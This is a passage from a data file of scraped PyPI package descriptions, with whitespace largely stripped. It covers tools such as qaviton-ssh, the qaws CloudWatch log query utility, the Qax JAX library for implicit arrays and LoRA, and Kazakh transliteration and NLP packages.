3.6+Featuresproxy requests \u2713Usagecreating a flask app# 
app.pyfromflaskimportFlaskfromqaviton_proxyimportproxyapp=Flask(__name__)@app.route(\"/prox\",methods=['GET'])defclient_session():returnproxy('https://proxied.com')app.run(port=3000)run the apppythonapp.pysend request to appimportrequestsresponse=requests.get('localhost:3000/prox')# send request to appprint(response.json())# got response from 'localhost:3000/prox' which proxied 'https://proxied.com'"} +{"package": "qaviton-ssh", "pacakge-description": "Qaviton SSHmaking ssh super easyInstallationpipinstall--upgradeqaviton_sshRequirementsPython 3.6+Featuressimple ssh send-recieve api \u2713async requests \u2717 (coming soon)multi-session workflow \u2717 (coming soon)Usagecreating an ssh clientfromqaviton_sshimportSSH# hostname is a reachable address for the machine# username is the allowed user to have ssh access# private_key is the file path or string of the private keyclient=SSH(hostname='x.x.x.x',username='username',private_key='pkey.pem')response=client.send('echo \"hello world\"')print(response.data,response.error)# server will respond with b'hello world', b''create a python script on the servercd='cd myproject'file='script.py'response=client.send_many([cd,f'touch{file}',f'echo \"print(\\\"script success\\\")\" >{file}'])assertnotresponse.errorexecute the scriptresponse=client.send_many([cd,f'python{file}'])assertnotresponse.errorprint(response.data)# server will respond with b'script success'"} +{"package": "qaws", "pacakge-description": "qaws - Query AWS LogsCommand line utility for search in AWS CloudWatch Logs with Insights queries and flexible time ranges.Install latest via pip:https://pypi.org/project/qaws.You need Python 3.8 (you can try lower version - not tested)Ensure you have you Python's Bin directory in $PATHExecute \"qaws\" in your command line.StatusImprovement proposalsWildcard should guarantee case insesitive name for group.Default walue for -t set to 1 day.Default value for -q set to \"fields @timestamp, @message | limit 9999\"Add switch to display group names in output.Default value for -g set to all groups?Workaround group amount limit?Workaround \"limit 9999\" limit?Set License to beer license?Validate users input.ManualNAME\n qaws -- Query AWS CloudWatch logs\nSYNOPSIS\n qaws [-g groups...]\n [-t starttime | starttime endtime]\n [-q query]\nDESCRIPTION\n -h --help\n Get this manual.\n -g --groups groups ...\n Specify 1 to N logging groups like \"/ecs/someservice1\". Wildcard * can be used like \"*ecs*some*1\".\n If you specify only -g flag then it will print all groups in CloudWatch\n -t --time starttime | starttime endtime\n Specify starttime in history to more recent endtime in present.\n Possible formats for time specification is:\n ISO time: \"2000-01-01T00:00:00\"\n Epoch in seconds: \"1590314700\"\n Time relative to Now:\n \"1h\" 1 hour ago\n \"1h 60m\" 2 hours ago\n \"1h 60m 3600s\" 3 hours ago\n \"3600s 60m 1h\" 3 hours ago as well (order doesn't matter)\n \"3600s 3600s 3600s\" 3 hours ago as well (items are repeatable)\n \"1y 1mo 1w 1d 1h 1m 1s\" is possible as well\n -g --query query\n Query exactly as it is usually written in AWS CloudWatch Insights in Web Console:\n fields @timestamp, @message\n | filter @message like 'event'\n | limit 10\"\n\n - It can take few minutes (~2 minutes) until logs appears in CloudWatch and therefore fetching logs\n with '-t \"1m\"' may not return any results\n - Even if you set '|limit 1' in --query then CloudWatch will anyway search over entire specified e.g. 
'-t \"10d\"'\n history which can take lot of time\n - When you use wildcard * in group names then it will take longer to finish query as all the log group names has to be fetched from AWS\nEXAMPLES\n - Prints all log groups in CloudWatch:\n qaws \\\\\n --groups\n - Prints all log groups in CloudWatch matching wildcard:\n qaws \\\\\n --groups \"*service*\"\n - Basic querying:\n qaws \\\\\n --groups \"/ecs/myservice0\" \\\\\n --time \"1h\" \\\\\n --query \"fields @message\"\n - Multiple groups specified with one containing wildcard:\n qaws \\\\\n --groups \"*ecs*service0\" \"/ecs/myservice1\" \"/ecs/myservice2\" \\\\\n --time \"1d 1h 30m\" \\\\\n --query \"fields @message\"\n - Query logs in between past 5 and 1 hour with wildcard:\n qaws \\\\\n --groups \"/ecs/*\" \\\\\n --time \"5h\" \"1h\" \\\\\n --query \"fields @timestamp @message | filter @message like 'event' | limit 9000\"\n - Query logs in between two ISO dates:\n qaws \\\\\n --groups \"/ecs/*\" \\\\\n --time \"2020-05-24T00:00:00\" \"2020-05-24T12:00:00\" \\\\\n --query \"fields @message | filter @message like 'event' | limit 9000\"\n - Combine relative time with ISO date:\n qaws \\\\\n --groups \"/ecs/*\" \\\\\n --time \"1y\" \"2020-05-24T00:00:00\" \\\\\n --query \"fields @message | filter @message like 'event' | limit 9000\"\nAUTHORS\n Jiri Kacirek (kacirek.j@gmail.com) 2020\nIMPLEMENTATION\n Python 3.8"} +{"package": "qax", "pacakge-description": "Qax: If it quacks like a tensor...\ud83e\udd86Qax\ud83e\udd86 is a tool for implementing types which represent tensors, but may or may not be instantiated as a single dense array on your GPU. Examples of this include:Quantization: A 4-bit array of integers + a small number of scale values are used to represent a full 16/32-bit arrayLoRA: An array $W$ is replaced by the array $(W + BA^T)$ so that $A$ and $B$ may be trained while leaving $W$ frozenSymbolic zeros/constants: For arrays which will consist entirely of a single repeated value, simply store that single value and the shape of the arrayCustom kernels: If you have a custom kernel and want to use it with existing models without modifying them, Qax is an easy way to do soHopefully many more things!The goal of Qax is to make implementing custom JAX behavior much easier, so that users won't need to deal with all the details of writing a full JAX transform. All you need to do to get custom representations is:Define what data/metadata your datatype should containOptionally write any number of handlers which specify how your type behaves under JAX primitives such as multiplicationWrite a function which constructs a dense array from your implicit representationBoth of the above are written in pure JAX, so no need for custom gradients (unless you want to of course!).Installationpip install qaxExample 1: A symbolic zeroThe way you specify custom behavior with Qax is to subclass theqax.ImplicitArrayabstract class. One of the simplest things we could implement is a symbolic zero: A data type which represents an arbitrary tensor full of zeros without actually instantiating them on the GPU.classZeros(qax.ImplicitArray):default_dtype=jnp.float32defmaterialize(self):# self.shape and self.dtype will be# populated by the ImplicitArray constructorreturnjnp.zeros(self.shape,self.dtype)def__str__(self):returnf'Zeros({self.shape},{self.dtype})'The only mandatory method to implement when subclassingImplicitArrayismaterialize().materialize()specifies how to turn ourimplicitlyrepresented array into anexplicitone, i.e. a single dense JAX array. 
In the case ofZeros, we can just calljnp.zeros.Let's instantiate aZerosinstance to try it out:z=Zeros(shape=(2,3))ImplicitArrays aredataclasses, which by default have two keyword only attributes:shapeanddtype.By default JAX won't know how to use our new type. In order to use it in functions, we apply the@use_implicit_argsdecorator:@qax.use_implicit_argsdeff(x,y):return(x+y)[0,0]withwarnings.catch_warnings():warnings.simplefilter('always')print(f(z,jnp.ones(3)))/home/davis/src/qax/qax/implicit/implicit_array.py:303: UserWarning: Primitive add was not handled by class Zeros, so implicit args will be materialized.\n warnings.warn(f'Primitive {primitive.name} was not handled by class {vals[implicit_idx].__class__.__name__}, so implicit args will be materialized.')\n\n\n1.0The cool thing is thatfdoesn't need to have any idea that it will be called withImplicitArrayinstances, so we can use this with any pre-existing model. Right now this isn't much use, since allzis being materialized into a dense array as soon as it's needed for a JAX operation.To make ourZerosdo something productive, let's implement the fact that $x + 0$ is always equal to $x$. We do this using the@qax.primitive_handlerdecorator:defget_binop_result_shape_dtype(a,b):out_shape=jnp.broadcast_shapes(jnp.shape(a),jnp.shape(b))out_dtype=jnp.result_type(a.dtype,b.dtype)returnout_shape,out_dtype# primitive_handler() takes a string, JAX primitive, or a list of those types# strings are used to find the corresponding primitive from `jax.lax`@qax.primitive_handler('add')defmy_add_handler(primitive,a:Zeros,b):# Handlers will receive as arguments:# - primitive: a jax.core.Primitive instance (often can be ignored if the handler is just for one op)# Any number of arguments which are either JAX values or ImplicitArrays# Keyword arguments specifying parameters of the operation (e.g. axes for reduction operations)out_shape,out_dtype=get_binop_result_shape_dtype(a,b)ifisinstance(b,Zeros):# We can return further ImplicitArray instances if we wantreturnZeros(shape=out_shape,dtype=out_dtype)# Return b, possibly modifying its shape or dtypereturnjnp.broadcast_to(b,out_shape).astype(out_dtype)The type annotationa : Zerosis actually important, Qax usesPlumfor multiple dispatch. You can even use this to define how different subclasses of ImplicitArray should interact with each other.(For convenience, commutative binary ops like $+$ and $\\times$ will automatically get their argument order switched so that theImplicitArrayinstance comes first.)Now when we callf, we no longer see the materialization log message, since our add handler is skipping over ever instantiating the array of zeros:print(f(z,jnp.ones(3)))1.0Let's define a multiplication handler as well, since $x \\cdot 0 = 0$ for all $x$:@qax.primitive_handler('mul')defhandle_mul(primitive,a:Zeros,b):out_shape,out_dtype=get_binop_result_shape_dtype(a,b)returnZeros(shape=out_shape,dtype=out_dtype)@jax.jit@qax.use_implicit_argsdefg(x,y):return(1+x)*yprint(g(z,z))Zeros((2, 3), float32)The output ofuse_implicit_argsis a function which is compatible with all the usual JAX transformations such asjit,vmap,grad, etc.Even this simple implementation is enough to let us modify the behavior of models which were written without knowing about Qax. 
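(Aside, not from the original README: the claim just above, that the decorated function stays compatible with jit, vmap and grad, is easy to sanity-check with the Zeros class defined earlier; the snippet below is only an illustrative sketch under that assumption.)
import jax
import jax.numpy as jnp
import qax

# Sketch only: check that jit and grad compose with use_implicit_args.
# `Zeros` is the symbolic-zero ImplicitArray subclass defined above.
@jax.jit
@qax.use_implicit_args
def sum_sq(x, y):
    return jnp.sum((x + y) ** 2)

# Differentiate with respect to the dense argument; the Zeros argument goes
# through the add handler registered earlier, so it is never materialized.
grads = jax.grad(sum_sq, argnums=1)(Zeros(shape=(3,)), jnp.arange(3.0))
print(grads)  # mathematically this should equal 2 * y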
Let's try replacing all the biases in HuggingFace's GPT-2 with zeros:@qax.primitive_handler('broadcast_in_dim')defbroadcast(primitive,a:Zeros,*,shape,broadcast_dimensions):# The biases get broadcast in order to add them to the activations# so we need to handle that case# Sometimes the simplest thing to do is use jax.eval_shape# to figure out what shape to returnresult_shape=jax.eval_shape(partial(jax.lax.broadcast_in_dim,shape=shape,broadcast_dimensions=broadcast_dimensions),a.aval# ImplicitArray has an aval property which will get an abstract shape/dtype).shapereturnZeros(shape=result_shape,dtype=a.dtype)model,params=transformers.FlaxAutoModelForCausalLM.from_pretrained('gpt2',_do_init=False)inputs=jnp.arange(1,10)[None]# Helper function to switch all the biases# in the params out for some other valuedefreplace_biases(params,replacer):defmaybe_replace_val(path,val):ifval.ndim!=1:returnval# Skip layernormsifany(isinstance(p,jax.tree_util.DictKey)andp.key.startswith('ln')forpinpath):returnvalreturnreplacer(shape=val.shape,dtype=val.dtype)returnjax.tree_util.tree_map_with_path(maybe_replace_val,params)# Replace the biases with dense zero arrays:params_with_zeros=replace_biases(params,jnp.zeros)print('New bias:',params['transformer']['h']['0']['attn']['c_attn']['bias'])output=model(inputs,params=params_with_zeros).logitsprint('Last logit average:',jnp.mean(output[0,-1]))New bias: [ 0.48033914 -0.5254326 -0.42926455 ... 0.01257301 -0.04987717\n 0.00324764]\nLast logit average: -105.25595Now let's try replacing them with our symbolic zeros instead:params_with_zeros=replace_biases(params,Zeros)print('New bias:',params['transformer']['h']['0']['attn']['c_attn']['bias'])# In this case since we're calling the model directly, we need to# wrap it so we can pass params in a positional argument# This usually won't be an issue since the call to the model will# be inside a loss function or some other functionoutput=qax.use_implicit_args(model)(inputs,params=params_with_zeros).logitsprint('Last logit average:',jnp.mean(output[0,-1]))New bias: [ 0.48033914 -0.5254326 -0.42926455 ... 0.01257301 -0.04987717\n 0.00324764]\nLast logit average: -105.25595delmodeldelparamsWe got the same result, but using 0 FLOPs for adding the biases! If you really wanted to flesh out the behavior ofZeros, you could also add handlers defining its output for primitives such assin,cos, etc. Let's move on to something more interesting though.Example 2: LoRAIn this example we'll implementLoRAin just a few lines of code. Unlike theZerosexample from the previous section, ourImplicitArraysubclass will actually contain data this time. As such we'll need to implement flattening/unflattening logic, since allImplicitArraysubclasses are pytrees. This also means you can usetree_mapand friends to manipulate them.To add child pytrees to a subclass, we just add them as dataclass attributes. 
To add auxilary data, you can wrap a field withqax.aux_fieldwhich is just a wrapper arounddataclass.field.LoRA replaces a matrix $W$ with the matrix $W_0 + AB^T$, so we'll have three arrays as new attributes.@dataclassclassLoraMatrix(qax.ImplicitArray):\"\"\"Represent W + A B^T\"\"\"w:qax.ArrayValuea:qax.ArrayValueb:qax.ArrayValue# auxiliary data exampleis_array_happy:bool=qax.aux_field(default=True)def__post_init__(self):# If you need to do any validation, you can override the __post_init__ method# This example is purely for error checking, but you can also# add manipulations of the attributessuper().__post_init__()w_aval=jax.core.get_aval(self.w)a_aval=jax.core.get_aval(self.a)b_aval=jax.core.get_aval(self.b)assertw_aval.ndim==a_aval.ndim==b_aval.ndim==2asserta_aval.shape[1]==b_aval.shape[1]asserta_aval.shape[0]==w_aval.shape[0]assertb_aval.shape[0]==w_aval.shape[1]asserta_aval.dtype==b_aval.dtype==w_aval.dtypedefmaterialize(self):returnself.w+self.a@self.b.T@qax.primitive_handler('dot_general')deff(primitive,x:jax.Array,w:LoraMatrix,*,dimension_numbers,**kwargs):# For this example, we'll only handle the simple case of of x @ w, rather than# all possible dot_general invocations(lhs_contract,rhs_contract),(lhs_batch,rhs_batch)=dimension_numbers# This check just makes sure that all that's happening is a simple matmulifnot(len(w.shape)==2andlhs_contract==(x.ndim-1,)andrhs_contract==(0,)andlhs_batch==()andrhs_batch==()):# If we want to only partially handle a particular primitive,# we can fall back to the default logic by returning NotImplementedreturnNotImplementedkwargs={**kwargs,'dimension_numbers':dimension_numbers}# In order to defer to the default implementation of the primitive,# use the qax.default_handler helper:result=qax.default_handler(primitive,# pass the primitivex,w.w,# Any number of positional arguments,**kwargs# Then the primitive's keyword args)xa=qax.default_handler(primitive,x,w.a,**kwargs)xab=qax.default_handler(primitive,xa,w.b.T,**kwargs)result+=xabreturnresultdeflora_from_tree(tree,key,lora_dim=8):\"\"\"Helper function for replacing non-embedding weightmatrices in T5 with LoraMatrix instances.\"\"\"defiter_keys(key):whileTrue:key,k2=jax.random.split(key)yieldk2key_it=iter_keys(key)defmap_fn(path,val):ifval.ndim!=2:returnval# Skip embedding paramsifany(isinstance(p,jax.tree_util.DictKey)andp.key=='embedding'forpinpath):returnvala=jax.random.normal(next(key_it),(val.shape[0],lora_dim),val.dtype)b=jnp.zeros((val.shape[1],lora_dim),val.dtype)returnLoraMatrix(val,a,b)returnjax.tree_util.tree_map_with_path(map_fn,tree)Let's try it out on a T5 model:t5,params=transformers.FlaxAutoModelForSeq2SeqLM.from_pretrained('t5-small',_do_init=False)tokenizer=transformers.AutoTokenizer.from_pretrained('t5-small')encoder_inputs=jnp.asarray(tokenizer.encode('Some input'))[None]decoder_inputs=jnp.asarray([0]+tokenizer.encode('Some output'))[None]lora_params=lora_from_tree(params,jax.random.PRNGKey(1234))orig_output=t5(input_ids=encoder_inputs,decoder_input_ids=decoder_inputs,params=params).logitslora_output=qax.use_implicit_args(t5)(input_ids=encoder_inputs,decoder_input_ids=decoder_inputs,params=lora_params).logitsprint(jnp.max(jnp.abs(lora_output-orig_output)))0.0The LoRA result is identical to the execution of the unmodified network, and we didn't get any materialization warnings so we successfully made a LoRA forward pass without ever calculating $W + AB^T$!TrainingSo far we haven't looked at how to train a model when using Qax. 
The main thing to understand is that you should applyqax.use_implicit_argsfirst,thendifferentiate the resulting function.use_implicit_argstransforms the function into one which goes from pytrees to pytrees, so all the standard JAX autodiff machinery will work.If you need to update only a subset of the elements of an ImplicitArray instance (e.g. onlyaandbfor LoRA), Qax providesqax.utils.freeze_keysto make this easier. Here's an end-to-end example training T5 to memorize the input/output pair from above:optimizer=optax.adam(3e-4)# freeze_keys_in_optimizer takes an optax optimizer, the ImplicitArray subclass to freeze for,# and an iterable of the keys to be frozenoptimizer=qax.utils.freeze_keys(optimizer,LoraMatrix,['w'])# We're only using a single example so we'll just close over the training data# There are no code changes from an ordinary training loop other than decorating# loss_fn with @use_implicit_args@qax.use_implicit_argsdefloss_fn(params):decoder_ids=decoder_inputs[:,:-1]targets=decoder_inputs[:,1:]logits=t5(input_ids=encoder_inputs,decoder_input_ids=decoder_ids,params=params).logitslogprobs=jax.nn.log_softmax(logits)target_logprobs=jnp.take_along_axis(logprobs,targets[:,:,None],axis=-1)loss=-jnp.sum(target_logprobs)returnlossgrad_fn=jax.value_and_grad(loss_fn)@jax.jitdefupdate(params,opt_state):loss,grads=grad_fn(params)updates,new_opt_state=optimizer.update(grads,opt_state,params=params)new_params=optax.apply_updates(updates,params)returnloss,new_params,new_opt_stateopt_state=optimizer.init(lora_params)forstepinrange(20):loss,lora_params,opt_state=update(lora_params,opt_state)print(f'{step}.{loss:.3f}')0. 8.882\n1. 5.375\n2. 3.787\n3. 2.524\n4. 1.491\n5. 0.723\n6. 0.242\n7. 0.062\n8. 0.022\n9. 0.013\n10. 0.011\n11. 0.009\n12. 0.008\n13. 0.007\n14. 0.007\n15. 0.006\n16. 0.005\n17. 0.004\n18. 0.003\n19. 0.003That's all you need to know to get started using Qax!Example 3: NestingQax supports arbitrary nesting ofImplicitArrayinstances without. Here's a quick demo combining the previous two examples:@qax.use_implicit_argsdefg(w,x):returnjnp.sum(x@w)w=jnp.ones((3,5))x=jnp.arange(3,dtype=jnp.float32)lora_with_symbolic_zero=LoraMatrix(w=w,a=Zeros(shape=(w.shape[0],6)),b=Zeros(shape=(w.shape[1],6)))print(f'Original:{g(w,x)}')withwarnings.catch_warnings():warnings.simplefilter('always')print(f'With lora:{g(lora_with_symbolic_zero,x)}')Original: 15.0\nWith lora: 15.0\n\n\nUserWarning: Primitive dot_general was not handled by class Zeros, so implicit args will be materialized.\n warnings.warn(f'Primitive {primitive.name} was not handled by class {vals[implicit_idx].__class__.__name__}, so implicit args will be materialized.')\nUserWarning: Primitive transpose was not handled by class Zeros, so implicit args will be materialized.\n warnings.warn(f'Primitive {primitive.name} was not handled by class {vals[implicit_idx].__class__.__name__}, so implicit args will be materialized.')If we wanted we could write adot_generalhandler to avoid the materialization as well, but the main point is just to illustrate that it's easy to mix and match differentImplicitArraysubclasses. 
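(Illustrative sketch, not part of the original README: the dot_general handler alluded to in the previous sentence could look roughly like the following, reusing the same eval_shape trick as the broadcast_in_dim handler shown earlier; the remaining transpose warning would need a similarly small handler.)
from functools import partial
import jax
import qax

# Sketch only: a matmul against an all-zeros operand is itself all zeros, so
# return another Zeros of the right shape/dtype instead of materializing.
@qax.primitive_handler('dot_general')
def zeros_dot(primitive, x: jax.Array, z: Zeros, **kwargs):
    # Use the default implementation purely to work out the output shape/dtype.
    out = jax.eval_shape(partial(qax.default_handler, primitive, **kwargs), x, z.aval)
    return Zeros(shape=out.shape, dtype=out.dtype)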
A more useful example might be using a symbolic zero as the offset for a quantization datatypes which expects both an offset and a scale.Other examplesHere'san example of using Qax to implement a 4-bit quantized matrix representation."} +{"package": "qaz", "pacakge-description": "No description available on PyPI."} +{"package": "qazaq-transliterator", "pacakge-description": "Python Qazaq TransliteratorTransliteration of the old Kazakh alphabet into a new one. Inspired bybarseghyanartur/transliteratePrerequisitesPython >=2.7, >=3.4, PyPyInstallationInstall with latest stable version from PyPI:pipinstallqazaq-transliteratorUsagefromqazaq_transliteratorimporttranslittext=\"\u049a\u0430\u0437\u0430\u049b\u0441\u0442\u0430\u043d \u0420\u0435\u0441\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0441\u044b \u2014 \u0428\u044b\u0493\u044b\u0441 \u0415\u0443\u0440\u043e\u043f\u0430 \u043c\u0435\u043d \u041e\u0440\u0442\u0430\u043b\u044b\u049b \u0410\u0437\u0438\u044f\u0434\u0430 \u043e\u0440\u043d\u0430\u043b\u0430\u0441\u049b\u0430\u043d \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442.\"print(translit(text))# Qazaqstan Respublikasy \u2014 \u015ey\u011fys Europa men Ortalyq Aziiada ornalasqan memleket.Testingpythonsetup.pytestChangelogPlease seeCHANGELOGfor more information on what has changed recently.ContributingPlease seeCONTRIBUTINGfor details.SecurityIf you discover any security related issues, please emailaltynbek.kazezov.97@gmail.cominstead of using the issue tracker.CreditsAltynbekAll ContributorsLicenseThe MIT License (MIT). Please seeLicense Filefor more information."} +{"package": "qazc", "pacakge-description": "No description available on PyPI."} +{"package": "qaznltk", "pacakge-description": "QazNLTK: a package for working with Kazakh language text processing.What is it?QazNLTKprovides developers with a fast and convenient tool for processing text in the Kazakh language. Tailored for the unique linguistic characteristics of Kazakh, this library offers a comprehensive set of tools for natural language processing, like: tokenization, sentence segmentation, evaluation similarity score and tranliteration of kazakh language cyrillic-latin.Table of ContentsMain FeaturesWhere to get itDependenciesLicenseGetting HelpContributing to QazNLTKMain FeaturesHere are just a few of the things that qaznltk does well:Kazakh language Text Tokenizing by keyword frequencies:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")tokens=qn.tokenize(text)print(tokens)# Input: \u0411\u0456\u0437\u0434\u0456\u04a3 \u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437 \u04af\u043b\u043a\u0435\u043d \u04e9\u0437\u0435\u043d \u0456\u0441\u043f\u0435\u0442\u0442\u0456. 
\u0421\u0456\u0437\u0434\u0456\u04a3 \u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3 \u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d \u0436\u0435\u04a3\u0456\u043b \u04e9\u0442\u0456\u043f, \u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442 \u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435 \u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d \u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439, \u0431\u0430\u049b\u044b\u0442 \u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430 \u0436\u0435\u0442\u0443\u0456\u043d \u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d!# Output: [('\u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437', 1), ('\u04af\u043b\u043a\u0435\u043d', 1), ('\u04e9\u0437\u0435\u043d', 1), ('\u0456\u0441\u043f\u0435\u0442\u0442\u0456', 1), ('\u0441\u0456\u0437\u0434\u0456\u04a3', 1), ('\u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3', 1), ('\u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d', 1), ('\u0436\u0435\u04a3\u0456\u043b', 1), ('\u04e9\u0442\u0456\u043f', 1), ('\u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442', 1), ('\u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435', 1), ('\u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d', 1), ('\u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439', 1), ('\u0431\u0430\u049b\u044b\u0442', 1), ('\u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430', 1), ('\u0436\u0435\u0442\u0443\u0456\u043d', 1), ('\u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d', 1)]Kazakh language Text Segmentation into sentences:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")sent_tokens=qn.sent_tokenize(text)print(sent_tokens)# Input: \u0411\u0456\u0437\u0434\u0456\u04a3 \u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437 \u04af\u043b\u043a\u0435\u043d \u04e9\u0437\u0435\u043d \u0456\u0441\u043f\u0435\u0442\u0442\u0456. 
\u0421\u0456\u0437\u0434\u0456\u04a3 \u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3 \u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d \u0436\u0435\u04a3\u0456\u043b \u04e9\u0442\u0456\u043f, \u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442 \u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435 \u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d \u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439, \u0431\u0430\u049b\u044b\u0442 \u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430 \u0436\u0435\u0442\u0443\u0456\u043d \u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d!# Output: ['\u0411\u0456\u0437\u0434\u0456\u04a3 \u04e9\u043c\u0456\u0440\u0456\u043c\u0456\u0437 \u04af\u043b\u043a\u0435\u043d \u04e9\u0437\u0435\u043d \u0456\u0441\u043f\u0435\u0442\u0442\u0456.', '\u0421\u0456\u0437\u0434\u0456\u04a3 \u049b\u0430\u0439\u044b\u0493\u044b\u04a3\u044b\u0437\u0434\u044b\u04a3 \u049b\u0438\u044b\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u0434\u0430\u043d \u0436\u0435\u04a3\u0456\u043b \u04e9\u0442\u0456\u043f, \u043c\u0430\u0445\u0430\u0431\u0431\u0430\u0442 \u0438\u0456\u0440\u0456\u043c\u0456\u043d\u0434\u0435 \u0431\u0430\u0441\u049b\u0430\u0440\u0443\u044b\u043d \u0436\u043e\u0493\u0430\u043b\u0442\u043f\u0430\u0439, \u0431\u0430\u049b\u044b\u0442 \u0441\u0430\u0440\u049b\u044b\u0440\u0430\u043c\u0430\u0441\u044b\u043d\u0430 \u0436\u0435\u0442\u0443\u0456\u043d \u0442\u0456\u043b\u0435\u0439\u043c\u0456\u043d!']Evaluate Difference score between 2 text:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()textA=input(\"Enter text A: \")textB=input(\"Enter text B: \")similarity_score=qn.calc_similarity(textA,textB)print(similarity_score)# Input: textA = \"\u0415\u04a3\u0431\u0435\u0433\u0456\u043d\u0435 \u049b\u0430\u0440\u0430\u0439 \u2014 \u049b\u04b1\u0440\u043c\u0435\u0442, \u0416\u0430\u0441\u044b\u043d\u0430 \u049b\u0430\u0440\u0430\u0439 \u2014 \u0456\u0437\u0435\u0442.\", textB = \"\u0415\u04a3\u0431\u0435\u0433\u0456\u043d\u0435 \u049b\u0430\u0440\u0430\u0439 \u0442\u0430\u0431\u044b\u0441\u044b, \u0415\u0440\u043b\u0456\u0433\u0456\u043d\u0435 \u049b\u0430\u0440\u0430\u0439 \u0434\u0430\u0431\u044b\u0441\u044b.\"# Output: 0.2222222222222222Convert Kazakh language Text from Cyrillic to Latin using ISO-9 Standard:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")latin_text=qn.convert2latin(text)print(latin_text)# Input: \u0411\u04af\u0433\u0456\u043d \u049b\u0430\u043d\u0434\u0430\u0439 \u043a\u0435\u0440\u0435\u043c\u0435\u0442 \u043a\u04af\u043d!# Output: B\u00f9g\u00ecn k\u0326andaj keremet k\u00f9n!Convert Kazakh language Text from Latin to Cyrillic using ISO-9 Standard:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")cyrillic_text=qn.convert2cyrillic(text)print(cyrillic_text)# Input: B\u00f9g\u00ecn k\u0326andaj keremet k\u00f9n!# Output: \u0411\u04af\u0433\u0456\u043d \u049b\u0430\u043d\u0434\u0430\u0439 \u043a\u0435\u0440\u0435\u043c\u0435\u0442 \u043a\u04af\u043d!Sentiment Analysis of Kazakh language text [negative: -1,neutral: 0,positive: 1]:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()text=input(\"Enter text: \")sentimize_score=qnltk.sentimize(text)print(sentimize_score)# Input: \u0411\u04b1\u043b \u043c\u0430\u049b\u0430\u043b\u0430 \u04e9\u0442\u0435 \u043d\u0430\u0448\u0430\u0440 \u0436\u0430\u0437\u044b\u043b\u0493\u0430\u043d.# Output: -1 (negative)Converting any numberNinto kazakh language number words [N <= 
10^31]:fromqaznltkimportqaznltkasqnltkqn=qnltk.QazNLTK()n=int(input())print(qnltk.num2word(n))# Input: N = 1465# Output: \u0431\u0456\u0440 \u043c\u044b\u04a3 \u0442\u04e9\u0440\u0442 \u0436\u04af\u0437 \u0430\u043b\u043f\u044b\u0441 \u0431\u0435\u0441Test Samples:https://vk.com/club121755042Where to get itThe source code is currently hosted on GitHub at:https://github.com/silvermete0r/QazNLTK.gitBinary installers for the latest released version are available at thePython\nPackage Index (PyPI).pipinstallqaznltkThe list of changes to pandas between each release can be foundhere. For full\ndetails, see the commit logs athttps://github.com/pandas-dev/pandas.DependenciesPackage was developed on built-in python functions;LicenseGetting Help\ud83d\udce7supwithproject@gmail.comContributing to qaznltkAll contributions, bug reports, bug fixes, documentation improvements, enhancements, and ideas are welcome.Go to Top"} +{"package": "qazse", "pacakge-description": "\u81ea\u5df1python\u9879\u76ee\u5e38\u7528\u5f97\u5de5\u5177\u5305"} +{"package": "qazwsx", "pacakge-description": "AboutAn Cross-Border E-Commerce Mover \u8de8\u5883\u7535\u5546\u642c\u8fd0\u5de5GoalMaking cross-border business easy worldwidecross-border-moverA Cross-border E-commerce MoverdesginFeaturesscrapetranslateextra-batch-images with sdwebuiapiuse pandas auto fill amazon listing excelPlanned Features:title generate by AIInstallpython -m pip install cross-border-moverUsageopen .\\XXBand.xlsm with Excel firstform cross-border-mover import Mover\n\n# move from taobao to amazon\ndf_amazon = Mover.fromTaobao(url).toAmazon()\n\n# move from pinduoduo to amazon\ndf_amazon = Mover.fromPDD(url).toAmazon()\n\n# move from 1688 to amazon\ndf_amazon = Mover.from1688(url).toAmazon()\n\n# move from taobao to Wish\ndf_wish = Mover.fromTaobao(url).toWish()\n\n# move from pinduoduo to Wish\ndf_wish = Mover.fromPDD(url).toAmazon()\n\n# move from 1688 to Wish\ndf_wish = Mover.from1688(url).toWish()"} +{"package": "qazxsw", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qb", "pacakge-description": "qb \u2013 SQL query builderDevelopment in progress."} +{"package": "qbabel", "pacakge-description": "No description available on PyPI."} +{"package": 